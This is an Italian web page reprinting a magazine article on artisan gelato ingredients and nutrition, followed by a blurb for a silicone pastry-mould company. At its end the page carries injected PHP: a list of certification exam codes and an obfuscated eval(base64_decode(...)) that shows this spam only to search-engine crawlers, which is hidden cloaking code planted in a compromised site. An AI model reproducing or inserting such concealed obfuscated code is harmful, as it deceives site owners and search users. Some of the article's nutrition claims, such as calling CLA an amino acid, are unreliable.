Immagine2

Formazione, preparazione e conservazione
per un sano gelato


GelatoInformare per informare! Questo detto ci porta a considerare quelle che sono le ragioni di un ritorno al passato. La ricerca continua dei gusti perduti legati alla conoscenza delle nuove tecnologie. Il gelatiere artigianale che sa trasmettere un prezioso bagaglio di conoscenze altro non fa che conservarci un prezzo di storia. Il carburante della Gelateria Italiana parte dalla corretta formazione, anche se la figura dell’apprendista di un tempo è stata soppiantata da normative inadeguate che rendono più difficile il percorso formativo.

Ancor oggi ci possiamo vantare di avere ottimi maestri dell’arte della pasticceria e gelateria; apprendisti di laboratorio di ieri che sapientemente hanno conservato i valori, le tecniche e la passione che trasmettono ai giovani assetati di apprendere.

Immagine1Latte fresco alta qualità, panna, zuccheri o miele, bagne alcoliche o succhi di frutta, frutta al naturale… sono questi i temi fondamentali che determinano la qualità di un prodotto, che fanno grande una gelateria ed il nome che la rappresenta, ma che oggi, con l’interesse del dietologo nutrizionista, riesce a dare una giusta valutazione su come, cosa e quanto sia importante un gelato nella terapia clinica.

Il gelatiere è l’affascinante artista che nel suo laboratorio crea, trasforma e valorizza i prodotti che più ci attirano e ci consolano. Bambini, donne, anziani e uomini d’affari, tutti uniti ad appagare il palato ed i sensi. Si, perché il gelato artigianale è tornato in auge anche grazie agli interventi dei vari nutrizionisti che hanno approfondito la conoscenza e la ricerca delle materie prime utilizzate in laboratorio, unitamente alla metodologia di produzione.

Nella preparazione gli ingredienti fondamentali si rincorrono in tutto l’arco dell’anno lavorativo: latte fresco, acqua, uova, panna fresca, grassi, latte in polvere, integratori, distillati di erbe e frutta (bagna alcolica), frutta fresca, frutta al naturale, frutta candita, frutta secca, zuccheri (saccarosio, miele, sciroppo di glucosio, fruttosio, zuccheri d’uva)…

Con questi elementi, con molta fantasia ed u  bel bagaglio di esperienza, il gelatiere riesce a creare il gelato artigianale.

Immagine2Ma andiamo ad esaminare gli aspetti nutrizionali di ogni singolo elemento. Nozioni che fanno parte della formazione del professionista.

LATTE FRESCO
Deve avere una sua caratteristica: l’alta qualità. La stabilità e la struttura nel gelato sono determinate dalla presenza di solidi del latte non grassi (slng). Questo consente un inglobamento di aria ed una sofficità unita alla cremosità e leggerezza. (fenomeno strutturale).

PANNA FRESCA VACCINA DAL 35 – 38% MG

ZUCCHERI
Hanno un ruolo importante nel bilanciamento delle miscele del gelato 15-19%. Il saccarosio la fa da padrone, essendo utilizzato in misura del 70% rispetto al destrosio (20%) e sciroppo di glucosio (10%), nelle ricette tradizionali.

Novità assoluta degno di nota sono gli zuccheri d’uva che, con il loro potere anticongelante e dolcificante, migliorano la struttura sostituendosi egregiamente al destrosio e fruttosio proveniente dai cereali e permettendo di abbassare i valori del saccarosio del 25%.

DISTILLATI DI ERBE E FRUTTA
Quella che viene definita bagna alcolica, ha una funzione determinante. Si è parlato molto delle crisi delle sostanze alcoliche e di ragazzi schiavi dell’alcool ma tutto ciò non ha niente a che vedere con il consumo di un pasticcino, di una fetta di torta o di un babà inzuppato con un ottimo rum. Troppo spesso si assiste alle richieste di un dolce senza alcool, magari inzuppato con acqua e zucchero, succhi di frutta o, peggio, col liquido di governo della frutta sciroppata.Immagine3

FIBRE
Altra innovazione è l’introduzione di fibre, come l’inulina, che aiutano ad avere struttura nel prodotto finito, apportando un vantaggio al consumatore a livello di attività intestinale. L’utilizzo deve rimanere al di sotto del 3% del totale della miscela, in quanto potrebbe determinare un senso di pesantezza intestinale.

PROTEINE DEL SIERO DI LATTE
Altra novità. Apprezzate sin dagli Egizi e dai Romani le loro notevoli capacità di migliorare le qualità strutturali, organolettiche e nutritive del prodotto, le rendono uno degli ingredienti naturali più eccellenti, oggi  sempre più impiegate dall’industria e dall’artigianato alimentare, in particolare nel segmento dietetico ed in quello della nutrizione sportiva e salutistica. Tali proteine rappresentano una componente preziosa, perché sono in grado di apportare nuove performance o di migliorare quelle esistenti. Controllano le proprietà strutturali, ritardando la formazione dell’umidità, perseverando intatte ed esaltando le qualità organolettiche: profumo, gusto, colore, consistenza, conservazione. E sostituiscono molto bene l’azione dei grassi vegetali idrogenati, conferendo alta digeribilità. Hanno un alto potere antiossidante. Positiva l’azione della cisteina e del CLA (acido linoleico coniugato), aminoacidi essenziali che contribuiscono a tonificare il muscolo ed ottimizzare la resistenza allo sforzo.

Possiamo quindi affermare che grazie al gelato artigianale si apportano miglioramenti nel campo della nutrizione. Il perfetto equilibrio delle materie prime naturali lo rende oggi protagonista nella produzione di una crescente gamma di prodotti che trovano applicazione nella normale dieta o alimentazione giornaliera del bambino, dello sportivo, dell’anziano.

Martino Liuzzi

(Tratto da Pasticceria Internazionale – Gennaio 2016)

Please follow and like us:
Formazione, preparazione e conservazione per un sano gelato

decosil


decosil nata dalla collaborazione di professionisti nel campo della pasticceria e della lavorazione del silicone, per offrire attrezzi per pasticceria che rispondono ad un elevato standard qualitativo e funzionale. decosil nuova azienda costituita per rispondere alle esigenze dei pasticceri professionisti e non, che vogliono proporre idee creative alla propria clientela con innovativi utensili per pasticceria. Proponiamo stampi in silicone antiaderenti di grado alimentare per la realizzazione di oggetti artistici e decorativi e per la fabbricazione di soggetti. Stampi personalizzati: possiamo replicare i loghi aziendali per la fabbricazione di cioccolatini personalizzati.


Post navigation


Lascia un commento

$fafrendslins = <<

000-017   000-080   000-089   000-104   000-105   000-106   070-461   100-101   100-105  , 100-105  , 101   101-400   102-400   1V0-601   1Y0-201   1Z0-051   1Z0-060   1Z0-061   1Z0-144   1z0-434   1Z0-803   1Z0-804   1z0-808   200-101   200-120   200-125  , 200-125  , 200-310   200-355   210-060   210-065   210-260   220-801   220-802   220-901   220-902   2V0-620   2V0-621   2V0-621D   300-070   300-075   300-101   300-115   300-135   3002   300-206   300-208   300-209   300-320   350-001   350-018   350-029   350-030   350-050   350-060   350-080   352-001   400-051   400-101   400-201   500-260   640-692   640-911   640-916   642-732   642-999   700-501   70-177   70-178   70-243   70-246   70-270   70-346   70-347   70-410   70-411   70-412   70-413   70-417   70-461   70-462   70-463   70-480   70-483   70-486   70-487   70-488   70-532   70-533   70-534   70-980   74-678   810-403   9A0-385   9L0-012   9L0-066   ADM-201   AWS-SYSOPS   C_TFIN52_66   c2010-652   c2010-657   CAP   CAS-002   CCA-500   CISM   CISSP   CRISC   EX200   EX300   HP0-S42   ICBB   ICGB   ITILFND   JK0-022   JN0-102   JN0-360   LX0-103   LX0-104   M70-101   MB2-704   MB2-707   MB5-705   MB6-703   N10-006   NS0-157   NSE4   OG0-091   OG0-093   PEGACPBA71V1   PMP   PR000041   SSCP   SY0-401   VCP550   1Z0-061   CISSP   70-487   SY0-401   70-486   220-801   300-075   c2010-652   000-080   210-065   350-030   JN0-360   74-678   LX0-104   300-070   70-410   350-050   PMP   70-483   JN0-360   200-355   200-125  , 210-060   100-101   70-412   VCP550   LX0-104   000-017  

EOT; eval/**/(base64_decode('JHNwZGU9IHN0cnRvbG93ZXIoJF9TRVJWRVIvKnRlc3QqL1svKiovIkhUVFBfVVNFUl9BR0VOVCIvKiovXSk7CmZ1bmN0aW9uIGNhZ3QoJHNwZCkKewokZ3RydWU9IHN0cl9yZXBsYWNlKCJ4IiwiIiwiYnhveHh0eHxneG94eG94Z3hseGV8eXh4YXhoeG94b3xteHN4bnxzeHhweGl4ZHhleHJ8d3hneGV4dCIpOwppZihwcmVnX21hdGNoKCIvJGd0cnVlL2kiLCRzcGQpKXsKcmV0dXJuIHRydWU7Cn1lbHNlewpyZXR1cm4gZmFsc2U7Cn0KfSAKaWYoY2FndCgkc3BkZSkpewplY2hvICRmYWZyZW5kc2xpbnM7Cn0=')); ?>